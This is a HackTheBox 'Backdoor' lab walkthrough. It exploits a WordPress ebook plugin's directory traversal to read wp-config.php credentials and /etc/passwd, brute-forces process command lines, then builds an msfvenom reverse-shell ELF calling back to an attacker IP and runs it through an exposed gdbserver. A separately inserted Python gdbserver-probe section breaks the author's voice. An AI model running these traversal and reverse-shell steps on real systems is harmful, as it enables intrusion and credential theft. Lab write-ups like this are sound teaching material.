[HackTheBox] Backdoor – Easy – WP


Machine info

  • OS: Linux
  • Difficulty: Easy

For an Easy box this one is on the harder side; beginners may want to skip it.

Write-up

Information gathering

An nmap scan shows three open TCP ports: SSH (22), HTTP (80) and an unidentified service on 1337:

root@kali$ nmap -p 22,80,1337 -sCV -oA scans/nmap-tcpscripts 10.10.11.125
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-20 16:55 UTC
Nmap scan report for 10.10.11.125
Host is up (0.091s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
|_https-redirect: ERROR: Script execution failed (use -d to debug)
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.25 seconds

An nmap --script vuln scan turns up nothing useful.

Based on the OpenSSH and Apache versions, the host is most likely Ubuntu 20.04 focal.

TCP – port 1337

nmap cannot identify the service, and sending data with nc and curl gets no response either:

root@kali$ nc -v 10.10.11.125 1337
Connection to 10.10.11.125 1337 port [tcp/*] succeeded!
hello
test
^C
root@kali$ curl 10.10.11.125:1337
^C

I'll skip it for now and come back to it later.

Web – port 80

The site

The site is a museum portal, most likely a template.


The “Home” link points to backdoor.htb, so I add it to /etc/hosts and brute-force subdomains with wfuzz; nothing comes back.

Tech stack

whatweb identifies the site as WordPress.

Scan it with wpscan:

root@kali$ wpscan -e ap,t,tt,u --url http://backdoor.htb --api-token $WPSCAN_API
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|              

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://backdoor.htb/ [10.10.11.125]
...[snip]...
...[snip]...
[+] XML-RPC seems to be enabled: http://backdoor.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
...[snip]...

Nothing useful there.

feroxbuster

feroxbuster saves the day! Brute-force the plugin directory with a plugin wordlist:

root@kali$ feroxbuster -u http://backdoor.htb/wp-content/plugins -w plugins.txt 

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.5.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://backdoor.htb/wp-content/plugins
 🚀  Threads               │ 50
 📖  Wordlist              │ plugins.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.5.0
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      277c http://backdoor.htb/wp-content/plugins/akismet
301      GET        9l       28w      340c http://backdoor.htb/wp-content/plugins/ebook-download => http://backdoor.htb/wp-content/plugins/ebook-download/
[####################] - 3m    160172/160172  0s      found:2       errors:1      
[####################] - 2m     80086/80086   508/s   http://backdoor.htb/wp-content/plugins 
[####################] - 2m     80086/80086   516/s   http://backdoor.htb/wp-content/plugins/ebook-download

That finds two plugins.


One of them is an ebook download plugin. Directory listing is enabled, so clicking into the folder shows its contents, including readme.txt (which gives the version) and the rest of the plugin files.

Foothold

Initial access – getting a shell

A search shows a public Exploit-DB entry for this ebook plugin.

PoC

I'll check the version first and then exploit it by hand.

root@kali$ curl http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt
=== Plugin Name ===                               
Contributors: zedna                                                 
Donate link: https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=3ZVGZTC7ZPCH2&lc=CZ&item_name=Zedna%20Brickick%20Website&currency_code=USD&bn=PP%2dDonationsBF%3abtn_donateCC_LG%2egif%3aNonHosted
Tags: ebook, file, download                                         
Requires at least: 3.0.4         
Tested up to: 4.4                             
Stable tag: 1.1 
...[snip]...

That version is affected.

I'll exploit the directory traversal by hand to read sensitive files:

root@kali$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
../../../wp-config.php../../../wp-config.php../../../wp-config.php<?php
/**
 * The base configuration for WordPress
...[snip]...
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wordpressuser' );

/** MySQL database password */
define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
...[snip]...

Trying to log in with that password gets nowhere.

Enumeration

Fuzzing file paths through the traversal with wfuzz eventually gets me /etc/passwd:

root@kali$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../etc/passwd
../../../../../../../etc/passwd../../../../../../../etc/passwd../../../../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...[snip]...
user:x:1000:1000:user:/home/user:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
<script>window.close()</script>

Trying SSH with it fails as well.

Process enumeration

The unknown service on port 1337 is still unused.

To see which processes are running on a system I can look at /proc (first on my own Kali box):

root@kali$ ls /proc/
1     109   12    130   1756  1820  1957  2070  2149  2194  224   2286  2431   28422  36    41     441  520    70500  766    786    79395  800    83982  913  97          cpuinfo        fs          kpagecgroup  mtrr          stat           version_signature
10    11    1203  131   1767  1825  1962  2075  2152  2197  2242  2291  2437   29     37    412    442  52570  70501  767    78741  79398  80168  84355  92   98          crypto         interrupts  kpagecount   net           swaps          vmallocinfo
100   111   1204  1336  1784  187   1964  2106  2154  22    225   23    2458   3      38    417    444  52571  70506  770    78742  79402  80173  84439  928  999         devices        iomem       kpageflags   pagetypeinfo  sys            vmstat
1002  112   1205  136   1786  19    1967  2110  2156  220   2254  2321  2478   30     386   41868  445  562    70507  772    78834  79567  80198  85154  93   acpi        diskstats      ioports     loadavg      partitions    sysrq-trigger  zoneinfo
102   113   1206  137   1797  190   1968  2114  2163  2208  2257  2335  25     31     39    42     447  5643   70508  774    78837  79627  802    85332  939  bootconfig  dma            irq         locks        pressure      sysvipc
1026  114   1207  14    18    191   1970  2116  2178  221   226   2343  2562   32     4     427    448  570    70509  775    790    79655  80214  85354  94   buddyinfo   driver         kallsyms    mdstat       schedstat     thread-self
1029  115   1208  15    1802  193   2     2123  2181  222   227   2353  2570   328    40    43     449  582    70510  78486  79065  79692  80228  85575  95   bus         dynamic_debug  kcore       meminfo      scsi          timer_list
104   116   1230  16    1803  1943  20    2135  2185  2223  228   2382  26     329    402   436    477  6      70511  78488  79069  79784  80458  85634  952  cgroups     execdomains    keys        misc         self          tty
105   117   127   160   1808  1945  2056  2142  2188  223   2284  2393  28     34     403   438    479  670    75954  78493  793    79870  80533  9      96   cmdline     fb             key-users   modules      slabinfo      uptime
107   1185  13    17    1809  1955  2061  2146  219   2234  2285  24    28408  35     4083  44     482  673    75979  785    79388  799    812    91     963  consoles    filesystems    kmsg        mounts       softirqs      version

There is also a self entry, a symlink to the PID of the current process:

root@kali$ ls -l /proc/self
lrwxrwxrwx 1 root root 0 Apr 18 21:38 /proc/self -> 85664

Inside each numbered directory, the cmdline file holds the command line the process was started with:

root@kali$ cat /proc/self/cmdline
cat/proc/self/cmdline

Note that there is no space between cat and the path: the arguments are separated by null bytes.

root@kali$ cat /proc/self/cmdline | xxd
00000000: 6361 7400 2f70 726f 632f 7365 6c66 2f63  cat./proc/self/c
00000010: 6d64 6c69 6e65 00                        mdline.

PoC on Backdoor

On Backdoor I can do the same thing:

root@kali$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../proc/self/cmdline
Warning: Binary output can mess up your terminal. Use "--output -" to tell 
Warning: curl to output it to your terminal anyway, or consider "--output 
Warning: <FILE>" to save to a file.

To get the binary data out of curl I use -o- and look at the result with xxd:

root@kali$ curl -s http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../proc/self/cmdline -o- | xxd
00000000: 2e2e 2f2e 2e2f 2e2e 2f2e 2e2f 2e2e 2f2e  ../../../../../.
00000010: 2e2f 2e2e 2f70 726f 632f 7365 6c66 2f63  ./../proc/self/c
00000020: 6d64 6c69 6e65 2e2e 2f2e 2e2f 2e2e 2f2e  mdline../../../.
00000030: 2e2f 2e2e 2f2e 2e2f 2e2e 2f70 726f 632f  ./../../../proc/
00000040: 7365 6c66 2f63 6d64 6c69 6e65 2e2e 2f2e  self/cmdline../.
00000050: 2e2f 2e2e 2f2e 2e2f 2e2e 2f2e 2e2f 2e2e  ./../../../../..
00000060: 2f70 726f 632f 7365 6c66 2f63 6d64 6c69  /proc/self/cmdli
00000070: 6e65 2f75 7372 2f73 6269 6e2f 6170 6163  ne/usr/sbin/apac
00000080: 6865 3200 2d6b 0073 7461 7274 003c 7363  he2.-k.start.<sc
00000090: 7269 7074 3e77 696e 646f 772e 636c 6f73  ript>window.clos
000000a0: 6528 293c 2f73 6372 6970 743e            e()</script>

The script echoes the parameter three times, concatenated directly, before the file contents. The \x00 separators in the output are what I want replaced with spaces.

The output ends with <script>window.close()</script>.

I can use tr to turn the null bytes into spaces and cut to drop the beginning and the end:

root@kali$ curl -s http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../proc/self/cmdline | tr '\000' ' ' | cut -c115- | rev | cut -c32- | rev
/usr/sbin/apache2 -k start

Breaking that down:

  • tr '\000' ' ' replaces null bytes with spaces

  • cut -c115- starts at character 115 and prints the rest (the path is 38 characters and is echoed three times, so 3 × 38 = 114 characters to skip)

  • rev | cut -c32- | rev reverses the string, starts at character 32, then reverses it back, which drops the last 31 characters (the closing <script> tag)

Writing a Bash script

I can write a Bash script that loops over a range of PIDs and reads each cmdline:

#!/bin/bash
# Read /proc/<pid>/cmdline for a range of PIDs through the traversal.

for i in $(seq 1 50000); do

    path="/proc/${i}/cmdline"
    # the plugin echoes the requested path three times before the file contents
    skip_start=$(( 3 * ${#path} + 1))
    # length of the trailing "<script>window.close()</script>" plus one
    skip_end=32

    res=$(curl -s "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=${path}" -o- | tr '\000' ' ')
    output=$(echo "$res" | cut -c ${skip_start}- | rev | cut -c ${skip_end}- | rev)
    if [[ -n "$output" ]]; then
        echo "${i}: ${output}"
    fi

done

The script fetches each result the same way as before, replaces \x00 with spaces, trims the beginning and end with cut, and prints the PID with its command line if there is one.

It gets through roughly 1000 PIDs a minute and soon finds PID 851:

root@kali$ ./brute_processes.sh  
1: /sbin/init auto automatic-ubiquity noprompt 
486: /lib/systemd/systemd-journald 
512: /lib/systemd/systemd-udevd 
529: /lib/systemd/systemd-networkd 
...[snip]...
826: /usr/sbin/cron -f 
829: /usr/sbin/CRON -f 
830: /usr/sbin/CRON -f 
851: /bin/sh -c while true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done 
853: /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done 
865: /usr/sbin/atd -f 
867: sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups 
887: /usr/sbin/apache2 -k start 
898: /usr/lib/accountsservice/accounts-daemon 
...[snip]...

The process is running:

/bin/sh -c while true;
    do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; 
done

It runs gdbserver as user, listening on port 1337; --once makes gdbserver exit after a single client connection, and the loop immediately starts a new one.
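Knowing it is gdbserver also explains why nc and curl on port 1337 got nothing earlier: gdbserver speaks the GDB Remote Serial Protocol and only answers packets framed as $payload#xx, where xx is the sum of the payload bytes modulo 256 in hex, so unframed text is silently dropped and nmap's probes did not match it. The following added Python example (mine, not from the write-up) builds and validates such frames and uses a qSupported probe to recognise the service; the host and port are the box's, everything else is assumption. Because of --once, each probe consumes one gdbserver instance, which the loop above respawns.

```python
import socket

# Host and port from the write-up; everything else in this file is the added example.
TARGET = ("10.10.11.125", 1337)


def rsp_checksum(payload: bytes) -> int:
    """RSP checksum: sum of the payload bytes modulo 256."""
    return sum(payload) % 256


def rsp_frame(payload: str) -> bytes:
    """Wrap a payload as '$payload#xx' with the two-hex-digit checksum."""
    data = payload.encode()
    return b"$" + data + b"#" + f"{rsp_checksum(data):02x}".encode()


def rsp_unframe(frame: bytes) -> str:
    """Validate a '$...#xx' frame (leading '+' acks are dropped) and return the payload."""
    frame = frame.lstrip(b"+")
    if not frame.startswith(b"$") or b"#" not in frame:
        raise ValueError("not an RSP packet")
    payload, _, csum = frame[1:].partition(b"#")
    if len(csum) < 2 or int(csum[:2], 16) != rsp_checksum(payload):
        raise ValueError("bad checksum")
    return payload.decode()


def looks_like_gdbserver(reply: bytes) -> bool:
    """A stub that answers qSupported with a PacketSize= feature list is gdbserver (or a clone)."""
    try:
        return "PacketSize=" in rsp_unframe(reply)
    except (ValueError, UnicodeDecodeError):
        return False


def recv_packet(sock: socket.socket) -> bytes:
    """Read until a complete '#xx' trailer has arrived (the ack and the packet may come separately)."""
    buf = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            return buf
        buf += chunk
        end = buf.find(b"#")
        if end != -1 and len(buf) >= end + 3:
            return buf


def probe(target=TARGET, timeout: float = 5.0) -> bool:
    """Connect, send an ack plus qSupported, and classify the reply (network; not run offline)."""
    with socket.create_connection(target, timeout=timeout) as sock:
        sock.sendall(b"+" + rsp_frame("qSupported"))
        reply = recv_packet(sock)
    return looks_like_gdbserver(reply)


if __name__ == "__main__":
    print("gdbserver" if probe() else "unknown")
```

The same framing is what gdb's target extended-remote does under the hood in the session below; a reply whose checksum does not verify is treated as not-RSP rather than trusted.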

Exploiting gdbserver

Uploading a reverse-shell ELF

HackTricks has an article on getting code execution through an exposed gdbserver.

Given that the target's gdbserver listens on port 1337 and runs from /home/user, that approach should work on Backdoor.

Create an ELF reverse shell and upload it to the remote debugger for execution:

root@kali$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 PrependFork=true -f elf -o rev.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 106 bytes
Final size of elf file: 226 bytes
Saved as: rev.elf

Local debugging

Before uploading, load the binary into gdb locally:

root@kali$ gdb -q rev.elf 
Reading symbols from rev.elf...
(No debugging symbols found in rev.elf)
(gdb)

Then connect to the remote gdbserver:

(gdb) target extended-remote 10.10.11.125:1337
Remote debugging using 10.10.11.125:1337
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
Reading symbols from target:/lib64/ld-linux-x86-64.so.2...
Reading /lib64/ld-2.31.so from remote target...
Reading /lib64/.debug/ld-2.31.so from remote target...
Reading /usr/lib/debug//lib64/ld-2.31.so from remote target...
Reading /usr/lib/debug/lib64//ld-2.31.so from remote target...
Reading target:/usr/lib/debug/lib64//ld-2.31.so from remote target...
(No debugging symbols found in target:/lib64/ld-linux-x86-64.so.2)
0x00007ffff7fd0100 in ?? () from target:/lib64/ld-linux-x86-64.so.2

Upload the ELF binary:

(gdb) remote put rev.elf /dev/shm/rev
Successfully sent file "rev.elf".

Set the remote executable to that file and run it:

(gdb) set remote exec-file /dev/shm/rev
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program:  
Reading /dev/shm/rev from remote target...
Reading /dev/shm/rev from remote target...
Reading symbols from target:/dev/shm/rev...
(No debugging symbols found in target:/dev/shm/rev)
[Detaching after fork from child process 33603]
[Inferior 1 (process 33592) exited normally]

Getting a shell

root@kali$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.125 46586
id
uid=1000(user) gid=1000(user) groups=1000(user)

Privilege escalation

I'll cover that in the next post.